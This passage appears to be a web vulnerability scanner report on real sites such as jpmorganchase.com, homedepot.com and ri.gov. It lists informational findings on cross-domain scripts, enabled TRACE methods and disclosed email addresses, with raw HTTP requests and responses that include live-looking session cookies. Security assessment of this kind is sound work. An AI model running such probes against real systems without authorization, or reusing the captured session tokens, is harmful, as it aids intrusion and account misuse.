<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vulnerability Rewa
...[SNIP]...
<center>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Len8wgAAAAAACf6Nd2UgmqoiHuP74_BI2bzUgWI"></script>
...[SNIP]...


<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

17.23. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/PlR5NIwei7d.js
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/AkRFnpL1mZ1.js
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/P7734y4-nbQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/zsO1NRKSlnU.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/FsUMU7xqUC9.js
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/2Gxt2Kl4nW6.js

Request

Response

17.24. http://www.interactivemediaawards.com/winners/certificate.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivemediaawards.com
Path:	/winners/certificate.asp

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

17.25. http://www.jpmorgan.com/pages/jpmorgan/am/usa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am/usa

Issue detail

The response dynamically includes the following script from another domain:

http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

Response

17.26. http://www.jpmorganchase.com/corporate/Home/home.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorganchase.com
Path:	/corporate/Home/home.htm

Issue detail

The response dynamically includes the following script from another domain:

https://chaseonline.chase.com/js/Reporting.js

Request

GET /corporate/Home/home.htm HTTP/1.1
Host: www.jpmorganchase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:26:42 GMT
Content-type: text/html
Content-Length: 143528

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...
<body><script type="text/javascript" src="https://chaseonline.chase.com/js/Reporting.js"></script>
...[SNIP]...

17.27. http://www.ox.popcap.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ox.popcap.com
Path:	/delivery/afr.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js

Request

Response

17.28. http://www.ri.gov/press/view/14202 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ri.gov
Path:	/press/view/14202

Issue detail

The response dynamically includes the following script from another domain:

http://platform.twitter.com/widgets.js

Request

GET /press/view/14202 HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.riema.ri.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:42 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 19068
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.29. http://www.riema.ri.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.riema.ri.gov
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.uscg.mil/safetylevels/levels.js

Request

GET / HTTP/1.1
Host: www.riema.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27463

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-Type" content="text/html; charset=iso-8859-1">
<met
...[SNIP]...
<div class="contentbox">

<script type="text/javascript" src="http://www.uscg.mil/safetylevels/levels.js"></script>
...[SNIP]...

17.30. http://www.youtube.com/embed/IHmPw1HsCe4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/IHmPw1HsCe4

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed-vflYo51x5.js

Request

Response

17.31. http://www6.homedepot.com/how-to/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www6.homedepot.com
Path:	/how-to/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://admin.brightcove.com/js/BrightcoveExperiences_all.js

Request

GET /how-to/index.html HTTP/1.1
Host: www6.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&quantity=1&catalogId=10053&orderItemId=339315499&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202349118&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; VISITORID=910187893; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=2; THD_SESSION=C34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22false%22%2c%22D1%22%3a%22%247%2e94%22%2c%22D2%22%3a%22%24241%2e06%22%7d%3a%3bC6%5fEXP%3d1313081163%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489162672%3a%3bC25%5fEXP%3d1362329162%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492763302%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2c%2bNrrMNX%2fCejPLC6nTINfj0lqY5c%3d; s_pers=%20s_campaign%3Dno%2520value%7C1310491412192%3B%20s_prevPage%3Dno%2520value%7C1310491412198%3B%20p_30%3Dno%2520value%7C1310491412200%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20SC_LINKS%3Dundefined%255E%255E%255E%255Eundefined%2520%257C%2520no%2520%2526lid%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderCalculate%2525253Fcheck%2525253D*n%25252526jspStoreDir%2525253Dhdus%25252526contractId%2525253D2081191%25252526itemAdd%2525253Dtrue%25252526orderId%2525253D131526257%25252526quantity%2525253D1%25252526catalogId%2525253D10053%25252526orderItemId%2525253D339315499%25252526langId%2525253D-1%25252526URL%2525253DOrderItemDisplayViewShiptoAssoc%25252526catEntryId%2525253D2023491%252526oid%25253DHeader-How-To%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "4510e172217dd9a45d36db306b163af0:1309442630"
Last-Modified: Thu, 30 Jun 2011 14:03:50 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 16:53:33 GMT
Content-Length: 11029
Connection: close
Cache-Control: no-store

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://www
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...

18. TRACE method is enabled previous next
There are 4 instances of this issue:

http://bh.contextweb.com/
http://image2.pubmatic.com/
http://pixel.rubiconproject.com/
http://www.iavisarts.org/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

18.1. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: f26c3b45068efc3b

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Content-Type: message/http
Content-Length: 886
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: f26c3b45068efc3b; cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d
...[SNIP]...

18.2. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 3dbaa59cf04c1d4d

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 3dbaa59cf04c1d4d; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_27=
...[SNIP]...

18.3. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 3d9e5472607128b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:54 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 3d9e5472607128b; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D126
...[SNIP]...

18.4. http://www.iavisarts.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iavisarts.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.iavisarts.org
Cookie: 8bc9c32383840c06

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:36:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.iavisarts.org
Cookie: 8bc9c32383840c06; PHPSESSID=e831394ad481953fc225b3137f4b5d65

19. Email addresses disclosed previous next
There are 69 instances of this issue:

https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome
https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js
https://admin.ccbill.com/ext-2.2/custom/combos.css
https://admin.ccbill.com/ext-2.2/ext-all.js
https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css
https://admin.ccbill.com/loginIndex.cgi
https://admin.ccbill.com/loginMM.cgi
http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
http://apps.ccbill.com/p/developer.html
http://apps.ccbill.com/tmp/cache/intelli.config.js
http://apps.ccbill.com/tmp/cache/intelli.lang.en.js
http://blog.katango.com/osd.xml
http://bstats.adbrite.com/click/bstats.gif
http://ec.ox.popcap.com/popcap/js/jquery/plugins/jquery.cookie.js
https://iblogin.jpmorgan.com/sso/action/federateLogin
https://iblogin.jpmorgan.com/sso/action/federateLogin
https://iblogin.jpmorgan.com/sso/action/web_ForgotUsername
https://iblogin.jpmorgan.com/sso/action/web_GetForgotUsername
https://iblogin.jpmorgan.com/sso/action/web_NeedHelp
http://ocsp.thawte.com/
http://sos.ri.gov/business/acknowledgements/
http://sos.ri.gov/business/filings/annualreports/
http://sos.ri.gov/business/filings/businessforms/
http://sos.ri.gov/elections/voters/register/
https://store.popcap.com/js/jquery/plugins/jquery.cookie.js
https://support.ccbill.com/
http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html
http://trustedcs.com/SecurityBlanket/SecurityBlanket.html
http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
http://ucc.state.ri.us/loginsystem/login_form.asp
http://www.211ri.org/js/prototype.js
http://www.akqa.com/contact/san-francisco
http://www.akqa.com/library/js/jquery.jqtransform-1.1.custom.min.js
http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php
https://www.chase.com/online/includes/javascript/jquery.url.js
http://www.citizencorps.gov/css/navDynamic.css
http://www.ct.gov/demhs/assets/templates/41/textsizer.js
http://www.ct.gov/demhs/site/default.asp
http://www.doit.ri.gov/directions/index.php
http://www.doit.ri.gov/news/projects/index.php
http://www.doit.ri.gov/search/index.php/
http://www.doit.ri.gov/search/index.php/captcha.php
http://www.fema.gov/css/text-styles.css
http://www.homedepot.com/lithium-handling.js
http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js
http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js
http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched
http://www.jpmorgan.com/script/jquery.pngFix.pack.js
http://www.jpmorgan.com/script/lightbox_support/controls.js
http://www.jpmorganchase.com/corporate/includes/javascript/jScrollTouch.js
http://www.jpmorganchase.com/corporate/includes/javascript/jquery.cookie.js
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
http://www.popcap.com/js/jquery/plugins/jquery.cookie.js
http://www.ri.gov/js/fontsizer.js
http://www.ri.gov/js/jquery_cookie.js
http://www.ri.gov/opengovernment/
http://www.ri.gov/plugins/mozilla_search.xml
http://www.ri.gov/styles/ui-widgets.css
http://www.ri.gov/subscriber/
https://www.ri.gov/about/
https://www.ri.gov/about/staff.php
https://www.ri.gov/js/fontsizer.js
https://www.ri.gov/js/jquery_cookie.js
https://www.ri.gov/styles/ui-widgets.css
http://www.riema.ri.gov/contact/
http://www.riema.ri.gov/js/jquery.cdc.ticker.js
http://www.us-cert.gov/cas/tips/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://access.jpmorgan.com
Path:	/appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The following email address was disclosed in the response:

abuse@chase.com

Request

GET /appmanager/jpmalogonportal/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 34382

<html>

<head>

<title>J.P. Morgan ACCESS</title><link rel="stylesheet" href="/framework/skins/jpmaskin/r3/css/jpmalogon.css" type="text/css"><link type="image/x-icon" rel="shortcut ic
...[SNIP]...
<a href="mailto:abuse@chase.com">abuse@chase.com</a>
...[SNIP]...

19.2. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/adapter/ext/ext-base.js

Issue detail

The following email address was disclosed in the response:

licensing@extjs.com

Request

Response

19.3. https://admin.ccbill.com/ext-2.2/custom/combos.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/custom/combos.css

Issue detail

The following email address was disclosed in the response:

licensing@extjs.com

Request

Response

19.4. https://admin.ccbill.com/ext-2.2/ext-all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/ext-all.js

Issue detail

The following email addresses were disclosed in the response:

licensing@extjs.com
user@domain.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Mon, 22 Dec 2008 23:37:29 GMT
ETag: "420aac-83c49-45eab2457e040"
Accept-Ranges: bytes
Content-Length: 539721
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext.DomHelper=function(){var L=null;var F=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i;var B=/^table|tbody|tr|td$/i;var A=function
...[SNIP]...
-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{"email":function(E){return B.test(E)},"emailText":"This field should be an e-mail address in the format \"user@domain.com\"","emailMask":/[a-z0-9_\.\-@]/i,"url":function(E){return A.test(E)},"urlText":"This field should be a URL in the format \"http:/"+"/www.domain.com\"","alpha":function(E){return C.test(E)},"alphaText"
...[SNIP]...

19.5. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/css/ext-all.css

Issue detail

The following email address was disclosed in the response:

licensing@extjs.com

Request

Response

19.6. https://admin.ccbill.com/loginIndex.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginIndex.cgi

Issue detail

The following email addresses were disclosed in the response:

clientsupport@ccbill.com
support@ccbill.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:01 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 6480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:clientsupport@ccbill.com">clientsupport@ccbill.com</a>
...[SNIP]...
<a href="mailto:support@ccbill.com">support@ccbill.com</a>
...[SNIP]...
<a href="mailto:clientsupport@ccbill.com">clientsupport@ccbill.com</a>
...[SNIP]...

19.7. https://admin.ccbill.com/loginMM.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginMM.cgi

Issue detail

The following email address was disclosed in the response:

clientsupport@ccbill.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:54 GMT
Set-Cookie: JSession=; domain=ccbill.com; path=/; expires=Mon, 11-Jul-2011 17:14:56 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 18889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel=
...[SNIP]...
<a href="mailto:clientsupport@ccbill.com">clientsupport@ccbill.com</a>
...[SNIP]...

19.8. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The following email address was disclosed in the response:

sales@webmasterchecks.com

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

19.9. http://apps.ccbill.com/p/developer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/p/developer.html

Issue detail

The following email addresses were disclosed in the response:

apps@ccbill.com
clientsupport@ccbill.com
techpubs@ccbill.com

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:03:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25506

